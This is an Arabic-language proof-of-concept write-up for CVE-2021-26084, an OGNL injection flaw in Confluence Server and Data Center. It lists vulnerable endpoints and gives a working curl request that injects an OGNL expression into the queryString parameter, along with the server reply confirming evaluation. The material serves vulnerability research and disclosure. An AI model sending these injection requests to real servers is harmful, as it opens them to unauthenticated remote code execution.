
استغلال إثبات المفهوم لثغرة CVE-2021-26084، وهي ثغرة حقن OGNL في Confluence Server وData Center، تعرض تنفيذًا عن بُعد للتعليمات البرمجية دون مصادقة.
توجد ثغرة حقن OGNL تسمح لمستخدم مصادق عليه، وفي بعض الحالات لمستخدم غير مصادق، بتنفيذ كود عشوائي على خادم Confluence أو مثيل Data Center.

معركتي لتحديد نقاط الدخول والحقن XD
| Fight (1) | Fight (2) |
|---|---|
![]() | ![]() |
أخيرًا، تم استغلال نقاط الدخول في Confluence
https://<REDACTED>/users/user-dark-features
https://<REDACTED>/login
https://<REDACTED>/pages/templates2/viewpagetemplate.action
https://<REDACTED>/template/custom/content-editor
https://<REDACTED>/templates/editor-preload-container
https://<REDACTED>/pages/createpage-entervariables.action
فحصي اليدوي الأول: ملاحظة: مستخدم قبل المصادقة
# curl -i -s -k -X $'POST' -H $'Host: <REDACTED>' -H $'User-Agent: alex666' -H $'Connection: close' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 44' -b $'JSESSIONID=<REDACTED>' --data-binary $'queryString=alt3kx\\u0027%2b#{6*666}%2b\\u0027' $'https://<REDACTED>/pages/createpage-entervariables.action'
استجابة الخادم:
HTTP/1.1 200
X-ASEN: <REDACTED>
Expires: Thu, 01 Jan 1970 00:00:00 GMT
<REDACTED>
[../snip]
<input type="hidden" name="queryString" value="alt3kx{3996=null}" />
https://jira.atlassian.com/browse/CONFSERVER-67940
https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html
مقالة رائعة منشورة هنا:
https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md
بعض التلميحات المفيدة جدًا من:
@wvuuuuuuuuuuuuu
@iamnoooob
Alex Hernandez الشهير بـ (@_alt3kx_)